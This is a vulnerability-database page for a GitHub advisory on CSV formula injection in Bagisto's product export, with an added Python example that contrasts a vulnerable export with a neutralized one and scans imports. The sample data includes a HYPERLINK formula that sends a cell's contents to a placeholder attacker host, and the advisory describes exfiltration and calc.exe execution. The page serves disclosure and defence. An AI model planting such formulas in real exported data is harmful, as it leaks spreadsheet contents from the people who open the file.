GHSA-JQRP-58FV-W8CQ
Vulnerability from github – Published: 2025-10-16 20:48 – Updated: 2025-10-16 20:48
Summary
When product data that begins with a spreadsheet formula character (for example =, +, -, or @) is accepted and later exported or saved into a CSV and opened in spreadsheet software, the spreadsheet interprets that cell as a formula. An authenticated user who can edit product data can therefore store a formula in a field such as the product name; when another user exports the catalog and opens the CSV, the victim's spreadsheet application may evaluate it, potentially leading to data exfiltration and, in older or loosely configured Excel environments (OLE/cmd constructs or Excel macros), remote command execution.
Details
Spreadsheet applications such as Excel and LibreOffice Calc treat cell text that begins with =, +, -, or @ as a formula (tab and carriage-return characters are also commonly listed as triggers). CSV carries no type information, so quoting the field does not help: the CSV parser strips the quotes and the spreadsheet still evaluates the content when the file is opened. The application neither neutralizes nor escapes leading formula characters when generating CSV, nor when accepting CSV import fields that are later displayed or re-exported.
PoC
Enter a CSV formula in the product name field and save the changes. Export the catalog to a CSV file and open it: calc.exe is executed. Other CSV export functions are affected as well.
http://127.0.0.1/admin/catalog/products/edit/1
Impact
Data exfiltration: spreadsheet functions that make network calls (e.g., WEBSERVICE or HYPERLINK, with string concatenation used to build a request URL that carries the contents of other cells) run on the victim's machine. Remote command execution: in some historical cases, specially crafted formulas and older Excel behaviors can lead to RCE. Modern Excel hardens many of these paths (for example by prompting before launching external applications), but the risk remains depending on the victim's environment and settings.
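To make the Details, PoC and Impact concrete, the following is an added example, not code from Bagisto or from the advisory. It writes a vulnerable product export beside a hardened one that applies the standard OWASP neutralization (prefix a single quote to any field starting with a formula trigger), and it includes an import-side scanner for the "accepting CSV import fields" case. The product rows, column names (sku, name, price) and the formula-bearing product names are constructed for illustration; the attacker hostname is a placeholder.

```python
import csv
import io

# Leading characters that Excel and LibreOffice Calc interpret as the start of
# a formula. The advisory lists =, +, -, @; OWASP's CSV-injection guidance also
# lists tab (0x09) and carriage return (0x0D).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value):
    """True if a string cell would be evaluated as a formula when opened."""
    return isinstance(value, str) and value.startswith(FORMULA_TRIGGERS)


def neutralize_csv_field(value):
    """Prefix a formula-looking string with a single quote so the spreadsheet
    treats it as literal text. Non-strings and harmless strings pass through."""
    if is_formula_like(value):
        return "'" + value
    return value


def export_products_csv(rows, neutralize=True):
    """Render product rows as CSV text.

    neutralize=False reproduces the vulnerable behaviour: fields are quoted
    but not neutralized, and quoting alone does not stop evaluation because
    the CSV parser strips the quotes before the spreadsheet sees the cell.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(["sku", "name", "price"])
    for row in rows:
        cells = [row["sku"], row["name"], row["price"]]
        if neutralize:
            cells = [neutralize_csv_field(c) for c in cells]
        writer.writerow(cells)
    return buf.getvalue()


def find_formula_fields(csv_text):
    """Import-side check: return (row, column, value) for every field in an
    uploaded CSV that starts with a formula trigger."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if is_formula_like(cell):
                findings.append((r, c, cell))
    return findings


# Constructed sample catalog. The three formula-bearing names stand in for
# attacker-controlled product data; attacker.example is a placeholder host.
SAMPLE_PRODUCTS = [
    {"sku": "SKU-001", "name": "Plain T-Shirt", "price": 19.99},
    {"sku": "SKU-002",
     "name": '=HYPERLINK("http://attacker.example/?"&A1,"click")',
     "price": 9.99},
    {"sku": "SKU-003", "name": "-1+1", "price": 5.0},
    {"sku": "SKU-004", "name": "@SUM(1,2)", "price": 1.0},
]


if __name__ == "__main__":
    vulnerable = export_products_csv(SAMPLE_PRODUCTS, neutralize=False)
    hardened = export_products_csv(SAMPLE_PRODUCTS)
    print("--- vulnerable export ---")
    print(vulnerable)
    print("--- hardened export ---")
    print(hardened)
    print("formula fields in vulnerable export:", find_formula_fields(vulnerable))
    print("formula fields in hardened export:  ", find_formula_fields(hardened))
```

Two caveats a practitioner will hit: legitimate values that start with "-" (negative numbers, phone numbers with a leading dash) are also prefixed, so keep numeric columns as numbers rather than strings, as the price column above does; and the leading apostrophe stays visible in some spreadsheet applications, which is the accepted cost of not having the cell evaluated.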
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.3.7"
},
"package": {
"ecosystem": "Packagist",
"name": "bagisto/bagisto"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.3.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-62417"
],
"database_specific": {
"cwe_ids": [
"CWE-1236"
],
"github_reviewed": true,
"github_reviewed_at": "2025-10-16T20:48:11Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "### Summary\nWhen product data that begins with a spreadsheet formula character (for example =, +, -, or @) is accepted and later exported or saved into a CSV and opened in spreadsheet software, the spreadsheet will interpret that cell as a formula. This allows an attacker to supply a CSV field (e.g., product name) that contains a formula which may be evaluated by a victim\u2019s spreadsheet application \u2014 potentially leading to data exfiltration and remote command execution (via older Excel exploits / OLE/cmd constructs or Excel macros).\n\n### Details\nSpreadsheet applications treat cell text that begins with characters =, +, -, @ as formulas. If unescaped, spreadsheet will interpret and evaluate the content when the file is opened. The application fails to neutralize/escape leading formula characters when generating CSV or when accepting CSV import fields for display/export.\n\n### PoC\nInsert CSV formula to the product name field, and save the changes. Export it to CSV file, open it and the calc.exe will be executed. Other CSV export functions are affected as well.\nhttp://127.0.0.1/admin/catalog/products/edit/1\n\u003cimg width=\"408\" height=\"302\" alt=\"image\" src=\"https://github.com/user-attachments/assets/2c6fd1e3-6725-4bf4-9c64-20cd57f4e279\" /\u003e\n\u003cimg width=\"1696\" height=\"854\" alt=\"image\" src=\"https://github.com/user-attachments/assets/911a69ae-65ac-4a8a-ad8e-63571a9610c8\" /\u003e\n\n### Impact\nData exfiltration: Using spreadsheet functions (e.g., WEBSERVICE, HYPERLINK, or concatenation to create requests) on victims\u0027 machines that make network calls.\nRemote command execution: In some historical cases, specially crafted formulas and older Excel behaviors can lead to RCE. Modern Excel hardens many of these, but risk remains depending on environment.",
"id": "GHSA-jqrp-58fv-w8cq",
"modified": "2025-10-16T20:48:11Z",
"published": "2025-10-16T20:48:11Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/bagisto/bagisto/security/advisories/GHSA-jqrp-58fv-w8cq"
},
{
"type": "WEB",
"url": "https://github.com/bagisto/bagisto/commit/8076c708498a0187bc952d5f5f705e0cb1919682"
},
{
"type": "PACKAGE",
"url": "https://github.com/bagisto/bagisto"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "bagisto has CSV Formula Injection in Create New Product"
}
Sightings
| Author | Source | Type | Date |
|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.